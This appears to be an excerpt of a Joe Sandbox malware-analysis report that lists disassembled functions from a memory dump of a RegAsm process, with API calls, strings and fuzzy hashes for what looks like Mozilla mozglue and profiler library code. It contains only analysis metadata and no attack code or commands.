API ID: ExclusiveLockfree$memset$AcquireCurrentReleaseThreadXbad_function_call@std@@$?vprint@PrintfTarget@mozilla@@__stdio_common_vsprintfmemcpy
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 2698983630-53385798
Opcode ID: 520d206790a3a29ac9d21e9076621633731af65e3a82cc1b94e74aa0bc4d4fb8
Instruction ID: 8475530341d42cb772804f91a3db3706d2c36b8365629fbf59a78e691ba8f5b4
Opcode Fuzzy Hash: 520d206790a3a29ac9d21e9076621633731af65e3a82cc1b94e74aa0bc4d4fb8
Instruction Fuzzy Hash: 6B02AB79A043459FCB10CF29C484B6ABBF5FF89308F10452CE99A9BB41D734EA55CB91

Function 6C10ED10 Relevance: 25.4, APIs: 16, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C10EE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C10EFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C111695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C1116B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C111770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C111A3E

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID:
API String ID: 3693777188-0
Opcode ID: 6c71aef5aef3f4a8702acd2b245217d88e665b5c691f8816d530c559592b7d86
Instruction ID: 8eec4f1f044547564a3838ea01649b94362e515d91c2142aaf71b6f9cf979bf8
Opcode Fuzzy Hash: 6c71aef5aef3f4a8702acd2b245217d88e665b5c691f8816d530c559592b7d86
Instruction Fuzzy Hash: 0AB36971E04219CFCB14CFA8C890A9DF7B2BF49304F2582A9D559ABB45D734AD86CF90

Function 6C127E10 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 403COMMON

Download Yara Rule

Strings

schema, xrefs: 6C1281E3, 6C128311
(pre-xul), xrefs: 6C127E88
data, xrefs: 6C128280, 6C1283E1
name, xrefs: 6C127ECF, 6C128335

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema
API String ID: 3412268980-999448898
Opcode ID: 28f787358f7ba86182a89f0638d989b5fd06e022be06e4ce14cd578739f23dba
Instruction ID: a0871de935f6ab0f810a3968899360cce1dcbb74086bfffbd7f719bec311c385
Opcode Fuzzy Hash: 28f787358f7ba86182a89f0638d989b5fd06e022be06e4ce14cd578739f23dba
Instruction Fuzzy Hash: 5FE17EB1A043408FC710CF69C84075BFBE9BB89318F55892DE8A5E7790DB74ED498B91

Function 6C10D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C16E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C11D1C5), ref: 6C10D4F2
LeaveCriticalSection.KERNEL32(6C16E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C11D1C5), ref: 6C10D50B

Part of subcall function 6C0ECFE0: EnterCriticalSection.KERNEL32(6C16E784), ref: 6C0ECFF6
Part of subcall function 6C0ECFE0: LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0ED026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C11D1C5), ref: 6C10D52E
EnterCriticalSection.KERNEL32(6C16E7DC), ref: 6C10D690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C10D6A6
LeaveCriticalSection.KERNEL32(6C16E7DC), ref: 6C10D712
LeaveCriticalSection.KERNEL32(6C16E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C11D1C5), ref: 6C10D751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C10D7EA

Strings

<jemalloc>, xrefs: 6C10D827
: (malloc) Error initializing arena, xrefs: 6C10D82C

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: 740424d7c062297d53978ae8f7ea3825a5ce7940c72ea8a7432e57c5bf97537a
Instruction ID: 1867428265d482eb23422f60530c4341f59a073a9743d78f8c4b06f3ee5789e8
Opcode Fuzzy Hash: 740424d7c062297d53978ae8f7ea3825a5ce7940c72ea8a7432e57c5bf97537a
Instruction Fuzzy Hash: 8291AF71B047018FD714DF29C59072AB7E1EF99318F158A2EE59A87F81EB34E845CB82

Function 6C144EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6C144EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C144F2E
moz_xmalloc.MOZGLUE ref: 6C144F52
memset.VCRUNTIME140(00000000,00000000), ref: 6C144F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C1452B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C1452E6
Sleep.KERNEL32(00000010), ref: 6C145481
free.MOZGLUE(?), ref: 6C145498

Strings

(, xrefs: 6C145250

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: f5e5c05af9cc78e83dd7c39bfe71d18e379fb3def85ee8eb4a2e2f8c4b89f8dd
Instruction ID: b7146093a1ae857e430ca1b02c8e4abf2185e6b878c6daa3ee9ba929753660e9
Opcode Fuzzy Hash: f5e5c05af9cc78e83dd7c39bfe71d18e379fb3def85ee8eb4a2e2f8c4b89f8dd
Instruction Fuzzy Hash: 86F1C071A18B008FC716DF39C85062BB7F6AFE6384F05872EF856A7651DB31D8428B81

Function 6C0F7810 Relevance: 15.4, APIs: 12, Instructions: 372COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C16E744), ref: 6C0F7885
LeaveCriticalSection.KERNEL32(6C16E744), ref: 6C0F78A5
EnterCriticalSection.KERNEL32(6C16E784), ref: 6C0F78AD
LeaveCriticalSection.KERNEL32(6C16E784), ref: 6C0F78CD
EnterCriticalSection.KERNEL32(6C16E7DC), ref: 6C0F78D4
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C0F78E9
EnterCriticalSection.KERNEL32(00000000), ref: 6C0F795D
memset.VCRUNTIME140(?,00000000,00000160), ref: 6C0F79BB
LeaveCriticalSection.KERNEL32(?), ref: 6C0F7BBC
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C0F7C82
LeaveCriticalSection.KERNEL32(6C16E7DC), ref: 6C0F7CD2
memset.VCRUNTIME140(00000000,00000000,00000450), ref: 6C0F7DAF

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavememset
String ID:
API String ID: 759993129-0
Opcode ID: 898fb76428ee43c3d8be26a56c44fcfb4743224f27e50f698cf8c02e11a92c07
Instruction ID: a8f32119eb1501db989865201b7ac670e41d282332ed9c4880ce70b0e84ae01e
Opcode Fuzzy Hash: 898fb76428ee43c3d8be26a56c44fcfb4743224f27e50f698cf8c02e11a92c07
Instruction Fuzzy Hash: D2026C71A0121A8FDB54CF19C9947A9B7F5FF88318F6582AADC19A7701D730AE91CF80

Function 6C125190 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 331timeCOMMON

Download Yara Rule

APIs

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C1251DF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C12529C
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6C1252FF
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C12536D
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C1253F7

Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6C1256C3
__Init_thread_footer.LIBCMT ref: 6C1256E0

Strings

MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6C1256BE

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
String ID: MOZ_PROFILER_RECORD_OVERHEADS
API String ID: 1227157289-345010206
Opcode ID: 7c6e763c5067b8be50ed6f32be0f0b1c1415046819a51dfe20054e9f55d6c7f3
Instruction ID: 5b42aad85117812430ae5af1d061b8673e719778c0ff82549faccbe0b788736f
Opcode Fuzzy Hash: 7c6e763c5067b8be50ed6f32be0f0b1c1415046819a51dfe20054e9f55d6c7f3
Instruction Fuzzy Hash: 65E1AF75918F45CAC312DF358850267B7B9BFAB394F10DB0EE8AA2A950DF34E0869701

Function 6C147030 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 6C147046
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 6C147060
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C14707E

Part of subcall function 6C0F81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C0F81DE

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C147096
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C14709C
LocalFree.KERNEL32(?), ref: 6C1470AA

Strings

(null), xrefs: 6C14706A, 6C147083
### ERROR: %s: %s, xrefs: 6C147087

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
String ID: ### ERROR: %s: %s$(null)
API String ID: 2989430195-1695379354
Opcode ID: 83664518a3cb1089ad3717fc1daebea72d9eb054754aba1b0f6dd81a60615b5f
Instruction ID: 3786b84f7895b8b6d633df20b273007d4ca3c00f23fb6dc78936c60c9674820d
Opcode Fuzzy Hash: 83664518a3cb1089ad3717fc1daebea72d9eb054754aba1b0f6dd81a60615b5f
Instruction Fuzzy Hash: FE01B9B2A00104AFDB00AB66DC4ADBF7BBCEF49254F010435FA45E7641E671A914DBA1

Function 6C132C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C132C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C132C61

Part of subcall function 6C0E4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C0E4E5A
Part of subcall function 6C0E4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C0E4E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C132C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C132E2D

Part of subcall function 6C0F81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C0F81DE

Strings

ProfileBuffer parse error: %s, xrefs: 6C132E3B
expected a Time entry, xrefs: 6C132E36
(root), xrefs: 6C13354F

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: 24b865cdcb3da31e8a6ec41feb1848e92aac3dd95797b99c635dc1a983564202
Instruction ID: c4c202e544fc40e8f0a99d702e5dc4db098ab1e69128a7b21704330664ec2429
Opcode Fuzzy Hash: 24b865cdcb3da31e8a6ec41feb1848e92aac3dd95797b99c635dc1a983564202
Instruction Fuzzy Hash: B291D0B06083808FC724DF28C48469EF7E0AFC935CF50592DE99A9B751DB34D54ACB92

Function 6C149E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6C149F3D
__aulldiv.LIBCMT ref: 6C149F77
__aullrem.LIBCMT ref: 6C149F8C
__aulldiv.LIBCMT ref: 6C14A023

Strings

-Infinity, xrefs: 6C149E60, 6C149E7B
NaN, xrefs: 6C149EAB

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: d712cd8e07d1b78508a8097884526138761f9a7755649799ba586cde7f65f196
Instruction ID: 642a7d4351bb235132c5e961003889e5410526bcf7cac9742cff46e1d9948533
Opcode Fuzzy Hash: d712cd8e07d1b78508a8097884526138761f9a7755649799ba586cde7f65f196
Instruction Fuzzy Hash: DDC1CF71E04319CBDB14CFA8C8A0B9EB7BAFF89714F158529D405ABB80D774AD49CB90

Function 6C14B910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0F9B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6C14B92D), ref: 6C0F9BC8
Part of subcall function 6C0F9B80: __Init_thread_footer.LIBCMT ref: 6C0F9BDB

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C0F03D4,?), ref: 6C14B955
NtQueryVirtualMemory.NTDLL ref: 6C14B9A5
NtQueryVirtualMemory.NTDLL ref: 6C14BA20
RtlNtStatusToDosError.NTDLL ref: 6C14BA7B
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C14BA81
GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C14BA86

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
String ID:
API String ID: 1753913139-0
Opcode ID: ed33ee96478dbc02edef8cca7b1300822fde88d5b5fc234e99d68e65671ea360
Instruction ID: b039a182d325543268beb46339abc911edf81cc66b368ee545b0899604fb6feb
Opcode Fuzzy Hash: ed33ee96478dbc02edef8cca7b1300822fde88d5b5fc234e99d68e65671ea360
Instruction Fuzzy Hash: E6516B71E01619DFDF14CEA8D990ADEB7B6EF88318F258129E901B7B44DB30AD458B90

Function 6C128AC0 Relevance: 7.7, APIs: 5, Instructions: 174timeCOMMON

Download Yara Rule

APIs

Part of subcall function 6C11FA80: GetCurrentThreadId.KERNEL32 ref: 6C11FA8D
Part of subcall function 6C11FA80: AcquireSRWLockExclusive.KERNEL32(6C16F448), ref: 6C11FA99

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C141563), ref: 6C128BD5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C141563), ref: 6C128C3A
ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6C141563), ref: 6C128C74
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6C141563), ref: 6C128CBA
free.MOZGLUE(?), ref: 6C128CCF

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
String ID:
API String ID: 2153970598-0
Opcode ID: d510cd06f3439ae9764385af5140338b17dc47db587a6e6c9a3fefc2555564ff
Instruction ID: ce05311d8bc25380f85b47e4a0f60a8a8d4230651fb63722b4a19d52af12d4e7
Opcode Fuzzy Hash: d510cd06f3439ae9764385af5140338b17dc47db587a6e6c9a3fefc2555564ff
Instruction Fuzzy Hash: CC71A075A14B008FD704CF29C48066AB7F1FF99318F058A5EE9899B722E774F884CB41

Function 6C0EF280 Relevance: 7.6, APIs: 5, Instructions: 87nativelibraryloaderCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 6C0EF2B4
GetProcAddress.KERNEL32(00000000,?), ref: 6C0EF2F0
NtQueryVirtualMemory.NTDLL ref: 6C0EF308
RtlNtStatusToDosError.NTDLL ref: 6C0EF36B
RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6C0EF371

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
String ID:
API String ID: 1171715205-0
Opcode ID: af680e6f2c9d1daa581b875098d24156b1109e520eae7f04c1bf5292ac26b91d
Instruction ID: 7c33014e84f4720059fcdf5e444195f103587b81929f4d86882cfa0ce1dd1e77
Opcode Fuzzy Hash: af680e6f2c9d1daa581b875098d24156b1109e520eae7f04c1bf5292ac26b91d
Instruction Fuzzy Hash: 1A21A5B0A44348EFEB109A75ED54BEF76FCAB4D35CF24422AE420966C0D7B49948C761

Function 6C15545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C158A4B

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 5977ac617dd7cb59b8f85a53f5fb77dc4f9fdc88b89412741504ced913574afd
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: E8B107B2E0021ACFDB14CF68CC907A8B7B2EF95314F5902A9C559DB791D730A996CF90

Function 6C15542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C1588F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C15925C

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 97aa2bbb0665c540cab951c0cc3df68417ab3c4f221eec0b4934f80116f2442e
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: A8B1E5B2E0020ACFDB14CF58C8917ADB7B2EF84314F550269C959DB785D734A99ACB90

Function 6C1550C7 Relevance: 6.5, APIs: 5, Instructions: 280COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C158E18
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C15925C

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
